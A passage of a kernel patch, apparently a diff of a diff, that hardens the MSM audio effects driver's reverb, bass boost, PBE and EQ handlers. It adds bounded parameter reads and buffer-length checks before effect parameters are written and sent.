-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s:REVERB_ENABLE prev:%d,new:%d\n", __func__,
- 					prev_enable_flag, reverb->enable_flag);
- 			if (prev_enable_flag != reverb->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_ENABLE;
--				*updt_params++ = REVERB_ENABLE_PARAM_SZ;
--				*updt_params++ = reverb->enable_flag;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_ENABLE;
-+				*updt_params++ =
-+					REVERB_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->enable_flag;
- 			}
- 			break;
- 		case REVERB_MODE:
-@@ -283,16 +356,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->mode = *values++;
-+			reverb->mode =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_MODE val:%d\n",
- 				__func__, reverb->mode);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_MODE;
--				*updt_params++ = REVERB_MODE_PARAM_SZ;
--				*updt_params++ = reverb->mode;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_MODE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_MODE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_MODE;
-+				*updt_params++ =
-+					REVERB_MODE_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->mode;
- 			}
- 			break;
- 		case REVERB_PRESET:
-@@ -301,16 +384,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->preset = *values++;
-+			reverb->preset =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_PRESET val:%d\n",
- 					__func__, reverb->preset);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_PRESET;
--				*updt_params++ = REVERB_PRESET_PARAM_SZ;
--				*updt_params++ = reverb->preset;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_PRESET_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_PRESET", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_PRESET;
-+				*updt_params++ =
-+					REVERB_PRESET_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->preset;
- 			}
- 			break;
- 		case REVERB_WET_MIX:
-@@ -319,17 +412,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->wet_mix = *values++;
-+			reverb->wet_mix =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_WET_MIX val:%d\n",
- 				__func__, reverb->wet_mix);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_WET_MIX_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_WET_MIX", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_WET_MIX;
--				*updt_params++ = REVERB_WET_MIX_PARAM_SZ;
--				*updt_params++ = reverb->wet_mix;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_WET_MIX_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->wet_mix;
- 			}
- 			break;
- 		case REVERB_GAIN_ADJUST:
-@@ -338,17 +440,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->gain_adjust = *values++;
-+			reverb->gain_adjust =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_GAIN_ADJUST val:%d\n",
- 					__func__, reverb->gain_adjust);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_GAIN_ADJUST_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_GAIN_ADJUST", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_GAIN_ADJUST;
--				*updt_params++ = REVERB_GAIN_ADJUST_PARAM_SZ;
--				*updt_params++ = reverb->gain_adjust;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_GAIN_ADJUST_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->gain_adjust;
- 			}
- 			break;
- 		case REVERB_ROOM_LEVEL:
-@@ -357,17 +468,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->room_level = *values++;
-+			reverb->room_level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_ROOM_LEVEL val:%d\n",
- 				__func__, reverb->room_level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_ROOM_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_ROOM_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_ROOM_LEVEL;
--				*updt_params++ = REVERB_ROOM_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->room_level;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_ROOM_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->room_level;
- 			}
- 			break;
- 		case REVERB_ROOM_HF_LEVEL:
-@@ -376,17 +496,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->room_hf_level = *values++;
-+			reverb->room_hf_level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_ROOM_HF_LEVEL val%d\n",
- 				__func__, reverb->room_hf_level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_ROOM_HF_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_ROOM_HF_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_ROOM_HF_LEVEL;
--				*updt_params++ = REVERB_ROOM_HF_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->room_hf_level;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_ROOM_HF_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->room_hf_level;
- 			}
- 			break;
- 		case REVERB_DECAY_TIME:
-@@ -395,17 +524,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->decay_time = *values++;
-+			reverb->decay_time =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DECAY_TIME val:%d\n",
- 				__func__, reverb->decay_time);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DECAY_TIME_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DECAY_TIME", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DECAY_TIME;
--				*updt_params++ = REVERB_DECAY_TIME_PARAM_SZ;
--				*updt_params++ = reverb->decay_time;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DECAY_TIME_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->decay_time;
- 			}
- 			break;
- 		case REVERB_DECAY_HF_RATIO:
-@@ -414,17 +552,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->decay_hf_ratio = *values++;
-+			reverb->decay_hf_ratio =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DECAY_HF_RATIO val%d\n",
- 				__func__, reverb->decay_hf_ratio);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DECAY_HF_RATIO_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DECAY_HF_RATIO", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DECAY_HF_RATIO;
--				*updt_params++ = REVERB_DECAY_HF_RATIO_PARAM_SZ;
--				*updt_params++ = reverb->decay_hf_ratio;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DECAY_HF_RATIO_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->decay_hf_ratio;
- 			}
- 			break;
- 		case REVERB_REFLECTIONS_LEVEL:
-@@ -433,18 +580,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->reflections_level = *values++;
-+			reverb->reflections_level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_REFLECTIONS_LEVEL val:%d\n",
- 				__func__, reverb->reflections_level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ =
--				      AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL;
--				*updt_params++ =
--					REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->reflections_level;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_REFLECTIONS_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL;
-+				*updt_params++ =
-+				REVERB_REFLECTIONS_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+				reverb->reflections_level;
- 			}
- 			break;
- 		case REVERB_REFLECTIONS_DELAY:
-@@ -453,18 +608,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->reflections_delay = *values++;
-+			reverb->reflections_delay =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_REFLECTIONS_DELAY val:%d\n",
- 				__func__, reverb->reflections_delay);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ =
--				      AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY;
--				*updt_params++ =
--					REVERB_REFLECTIONS_DELAY_PARAM_SZ;
--				*updt_params++ = reverb->reflections_delay;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_REFLECTIONS_DELAY_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_REFLECTIONS_DELAY", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY;
-+				*updt_params++ =
-+				REVERB_REFLECTIONS_DELAY_PARAM_SZ;
-+				*updt_params++ =
-+				reverb->reflections_delay;
- 			}
- 			break;
- 		case REVERB_LEVEL:
-@@ -473,16 +636,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->level = *values++;
-+			reverb->level =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_LEVEL val:%d\n",
- 				__func__, reverb->level);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_LEVEL;
--				*updt_params++ = REVERB_LEVEL_PARAM_SZ;
--				*updt_params++ = reverb->level;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_LEVEL_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_LEVEL", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_LEVEL;
-+				*updt_params++ =
-+					REVERB_LEVEL_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->level;
- 			}
- 			break;
- 		case REVERB_DELAY:
-@@ -491,16 +664,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->delay = *values++;
-+			reverb->delay =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s:REVERB_DELAY val:%d\n",
- 					__func__, reverb->delay);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
--				*updt_params++ = AUDPROC_PARAM_ID_REVERB_DELAY;
--				*updt_params++ = REVERB_DELAY_PARAM_SZ;
--				*updt_params++ = reverb->delay;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					REVERB_DELAY_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DELAY", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_REVERB_DELAY;
-+				*updt_params++ =
-+					REVERB_DELAY_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->delay;
- 			}
- 			break;
- 		case REVERB_DIFFUSION:
-@@ -509,17 +692,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->diffusion = *values++;
-+			reverb->diffusion =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DIFFUSION val:%d\n",
- 				__func__, reverb->diffusion);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DIFFUSION_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DIFFUSION", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DIFFUSION;
--				*updt_params++ = REVERB_DIFFUSION_PARAM_SZ;
--				*updt_params++ = reverb->diffusion;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DIFFUSION_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->diffusion;
- 			}
- 			break;
- 		case REVERB_DENSITY:
-@@ -528,17 +720,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			reverb->density = *values++;
-+			reverb->density =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: REVERB_DENSITY val:%d\n",
- 				__func__, reverb->density);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					REVERB_DENSITY_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"REVERB_DENSITY", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_REVERB;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_REVERB_DENSITY;
--				*updt_params++ = REVERB_DENSITY_PARAM_SZ;
--				*updt_params++ = reverb->density;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					REVERB_DENSITY_PARAM_SZ;
-+				*updt_params++ =
-+					reverb->density;
- 			}
- 			break;
- 		default:
-@@ -546,7 +747,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -560,15 +761,16 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 					struct bass_boost_params *bass_boost,
- 					long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -581,10 +783,14 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case BASS_BOOST_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -593,18 +799,27 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = bass_boost->enable_flag;
--			bass_boost->enable_flag = *values++;
-+			bass_boost->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: BASS_BOOST_ENABLE prev:%d new:%d\n",
- 				__func__, prev_enable_flag,
- 				bass_boost->enable_flag);
- 			if (prev_enable_flag != bass_boost->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					BASS_BOOST_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"BASS_BOOST_ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_BASS_BOOST_ENABLE;
--				*updt_params++ = BASS_BOOST_ENABLE_PARAM_SZ;
--				*updt_params++ = bass_boost->enable_flag;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					BASS_BOOST_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					bass_boost->enable_flag;
- 			}
- 			break;
- 		case BASS_BOOST_MODE:
-@@ -613,17 +828,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			bass_boost->mode = *values++;
-+			bass_boost->mode =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: BASS_BOOST_MODE val:%d\n",
- 				__func__, bass_boost->mode);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					BASS_BOOST_MODE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"BASS_BOOST_MODE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_BASS_BOOST_MODE;
--				*updt_params++ = BASS_BOOST_MODE_PARAM_SZ;
--				*updt_params++ = bass_boost->mode;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					BASS_BOOST_MODE_PARAM_SZ;
-+				*updt_params++ =
-+					bass_boost->mode;
- 			}
- 			break;
- 		case BASS_BOOST_STRENGTH:
-@@ -632,17 +856,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			bass_boost->strength = *values++;
--			pr_debug("%s: BASS_BOOST_STRENGTHi val:%d\n",
-+			bass_boost->strength =
-+				GET_NEXT(values, param_max_offset, rc);
-+			pr_debug("%s: BASS_BOOST_STRENGTH val:%d\n",
- 				__func__, bass_boost->strength);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					BASS_BOOST_STRENGTH_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"BASS_BOOST_STRENGTH", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_BASS_BOOST;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_BASS_BOOST_STRENGTH;
--				*updt_params++ = BASS_BOOST_STRENGTH_PARAM_SZ;
--				*updt_params++ = bass_boost->strength;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					BASS_BOOST_STRENGTH_PARAM_SZ;
-+				*updt_params++ =
-+					bass_boost->strength;
- 			}
- 			break;
- 		default:
-@@ -650,7 +883,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -664,15 +897,16 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 					struct pbe_params *pbe,
- 					long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, j, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -685,10 +919,14 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case PBE_ENABLE:
- 			pr_debug("%s: PBE_ENABLE\n", __func__);
-@@ -698,15 +936,24 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = pbe->enable_flag;
--			pbe->enable_flag = *values++;
-+			pbe->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			if (prev_enable_flag != pbe->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_PBE;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					PBE_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"PBE_ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_PBE;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_PBE_ENABLE;
--				*updt_params++ = PBE_ENABLE_PARAM_SZ;
--				*updt_params++ = pbe->enable_flag;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					PBE_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					pbe->enable_flag;
- 			}
- 			break;
- 		case PBE_CONFIG:
-@@ -719,15 +966,26 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_PBE;
-+				params_length += COMMAND_PAYLOAD_SZ + length;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"PBE_PARAM", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_PBE;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_PBE_PARAM_CONFIG;
--				*updt_params++ = length;
-+				*updt_params++ =
-+					length;
- 				for (j = 0; j < length; ) {
- 					j += sizeof(*updt_params);
--					*updt_params++ = *values++;
-+					*updt_params++ =
-+						GET_NEXT(
-+						values,
-+						param_max_offset,
-+						rc);
- 				}
--				params_length += COMMAND_PAYLOAD_SZ + length;
- 			}
- 			break;
- 		default:
-@@ -735,7 +993,7 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length)
-+	if (params_length && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- invalid_config:
-@@ -747,15 +1005,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 					 struct eq_params *eq,
- 					 long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -768,11 +1027,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
--		int idx, j;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
